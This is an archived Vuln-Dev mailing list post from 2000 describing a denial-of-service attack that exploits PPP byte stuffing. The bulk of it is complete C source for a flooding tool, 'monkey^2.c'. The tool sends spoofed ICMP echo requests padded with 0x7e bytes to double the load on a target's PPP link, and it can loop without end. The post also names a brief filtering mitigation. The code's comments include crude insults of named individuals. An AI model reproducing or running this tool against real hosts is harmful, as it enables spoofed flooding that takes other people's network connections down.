Vulnerability Development mailing list archives
New DOS attack vs ppp links
From: bahz0r () YAHOO COM (cat catzor)
Date: Fri, 21 Jul 2000 03:51:35 -0700
------ USSR Research. Concept: PPP uses a speciffic flag byte to signify begining and end of ppp frame. If this byte is contained in the data portion of the frame it is escaped by two other bytes. Crafting a packet filled with the flag byte doubles the amount of data which goes through the ppp link, as well as consumes resources while the escaped bytes are unescaped. Problem: "Problem" (and i do say "problem" because i see no way around this) lies within ppp itself, on link level. It is irrelevant which protocol is used to deliver data to the target machine. Solution: Disallow icmp trafic to your ppp connected machines (before the ppp link), or filter packets which contain suspicious number of the ppp flag byte (0x7e); Technical: A typical ppp frame looks like this: [FLAG (7e)][ADDR][CONTROL][PROTOCOL][INFORMATION][CRC][FLAG (7e)] Note: most implementations don't actually transmit addr and control fields (since these are static). If the flag charachter is contained within the [INFORMATION] portion of the frame, it is replaced by a sequence of [0x7d 0x5e] So if an incoming packet contains one 7e byte, it will get converted to two other bytes when it enters the ppp link, hence, the flood will double. The attached code uses icmp echo request to deliver the data to target. If the target also replies to this packet (as it should) it will once again amplify the flood. In other words, for each byte the attacker sends, targets gets hit with two, and replies with two. Attached code supports spoofing of originating IP adress. NOTE: by default ppp will also escape any byte with value less than 0x20 (i.e any ASCII controll charachter) so while simply filtering suspicious amounts of 0x7e might save your ppp users from this particular piece of code, modifying the attack is as simple as changing the data character. Code: Code developed by xaiou. Concept developed by xaiou, reviewed by USSR Research. File Name: monkey^2.c Platform: linux 2.x Compile: gcc -o monkey^2 monkey.c Suggested: ansi color capable terminal. IMPORTANT: in order for this to do what it's supposed to do, it is imperial that the attacker NOT be on a ppp link himself. If one was to attack a ppp link FROM a ppp link, it would prove completely useless. (because you'd be sending 2 bytes and target would be getting hit by two, you might as well ping -f); ---------------------- begin monkey^2.c ---------------------------------- /**************************************************************************** * Monkey Squared Dot Cee - only thing better than a monkey.... * * is monkey squared. - me myself and xaiou. * * USSR Research Team - Concept and code by xaiou. Checksum function * * stolen from smurf by TFreak. * * Concept: ppp uses a special byte, namely 0x7e to designate start and * * end of a packet. If this byte appears in data, it is escaped with * * 0x7d and 0x5e. So in conclusion sending, a spoofed icmp echo request * * to a target host on ppp link, loaded with 0x7e, first of all, the load * * doubles when it hits the ppp link, and if that wasn't enough, the victim * * responds with this packet, again doubling the load. So for each 1 byte * * you send victim recieves two and sends out two. Not bad, eh? Anyways * * the only solution I see to this is to block icmp echo requests to your * * ppp linked friends. * * * * Props: USSR Research, Neounix.com, superluck, optiklenz, * * Richard Stevens (you're my hero), powerbox, armoredtech * * w00w00 team (j00 ar3 3rl33t), all the people in #c (i love you * * guys!), aliensex, OGL, IanH. Also TFreak (i hope you don't mind * * me borrowing your checksum function.) Also phrack and route * * (you are my other hero), BlackIC for the coloreds. DJ Jeff from * * the 418 club in mineapolis, and that one stripper... * * * * Morons: digiebola ("hacker" who can't code hello world) and his slut * * "girlfriend" (the girl part is debatable). All irc hookers, * * people who run NT, people who buy NT, people who make NT, * * People who think think they're LOU (you are not lou damn it) * * * * --------------------- USSR Research Team 2000 --------------------------*/ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <netdb.h> #include <ctype.h> #include <arpa/inet.h> #include <unistd.h> #include <string.h> #define GREEN "\033[32m" #define RED "\033[31m" #define GRAY "\033[37m" unsigned short in_chksum (u_short *addr, int len); /* stolen from smurf */ void ussrinfo(void); void usage(void); int main (int ARGC, char *ARGV[]) { struct iphdr *iphdr; struct icmphdr *icmphdr; struct sockaddr_in sockaddress; char *packet; int raw_socket; int i; int no_packetsz; int sizeofpacket; char *data; ussrinfo(); if(ARGC != 5) { usage(); exit(0); } sizeofpacket = atoi(ARGV[4]); data = (char *)malloc(sizeofpacket); memset(data, 0x7e, sizeofpacket); /* name the socket */ sockaddress.sin_addr.s_addr = inet_addr(ARGV[2]); sockaddress.sin_family = AF_INET; /* internet socket */ sockaddress.sin_port = 0; /* it's icmp...no port */ if ((raw_socket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("getting socket"); exit(-1); } packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + sizeofpacket); iphdr = (struct iphdr *)packet; /* ip now refers to packet.iphdr */ icmphdr = (struct icmphdr *) (packet + sizeof(struct iphdr)); iphdr->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + sizeofpacket); iphdr->ihl = 5; /* ip header lenght in 32 bit words */ iphdr->version = 4; iphdr->ttl = 255; /* maximum hops */ iphdr->tos = 0; iphdr->frag_off = 0; /* data offset */ iphdr->protocol = IPPROTO_ICMP; iphdr->saddr = inet_addr(ARGV[1]); /* fake source */ iphdr->daddr = sockaddress.sin_addr.s_addr; /* reall destination */ iphdr->check = in_chksum((u_short *)iphdr, sizeof(struct iphdr)); /* checksum */ icmphdr->type = 8; /* echo request */ icmphdr->code = 0; /* icmp subcode...screw it */ icmphdr->checksum = in_chksum((u_short *)icmphdr, sizeof(struct icmphdr) + sizeofpacket); printf(RED"Now flooding %s\n", ARGV[2]); no_packetsz = atoi(ARGV[3]); i=0; while(1) { printf(GRAY"."); sendto(raw_socket, packet, (sizeof(struct iphdr) + sizeof(struct icmphdr) + sizeofpacket), 0, (struct sockaddr *)&sockaddress, sizeof(struct sockaddr)); if( (i > no_packetsz) && (no_packetsz != 0)) { break; } i++; } printf(GREEN"\nMonkey Complete...monkey squared complete.\n"GRAY); return 1; } unsigned short in_chksum (u_short *addr, int len) { register int nleft = len; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *addr++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)addr; sum += answer; } sum = (sum >> 16) + (sum + 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } void ussrinfo(void) { printf("---------------------------------------------------------------\n"); printf(GREEN"| Underground Security Systems Research Proudly Presents: |\n\n"); printf("| monkey squared dot cee - ppp linkz ...the end is near. | \n"); printf("| By: xaiou (tarik). | \n"); } void usage(void) { printf(RED"| Usage: monkey^2 source destination number (0 for infinite ) |\n"); printf(GRAY"|---------------------USSR Research --------------------------|\n"); } ------------------------------------ end monkey^2.c ------------------------ EOF __________________________________________________ Do You Yahoo!? Get Yahoo! Mail Free email you can access from anywhere! http://mail.yahoo.com/ <HR NOSHADE> <UL> <LI>application/x-unknown attachment: monkey^2.c </UL>
Current thread:
- New DOS attack vs ppp links cat catzor (Jul 21)
- Re: New DOS attack vs ppp links Brad Spengler (Jul 23)
- Re: New DOS attack vs ppp links Eric Andry (Jul 27)
- Re: New DOS attack vs ppp links Brad Spengler (Jul 28)
- Re: New DOS attack vs ppp links Eric Andry (Jul 27)
- Re: New DOS attack vs ppp links Brad Spengler (Jul 23)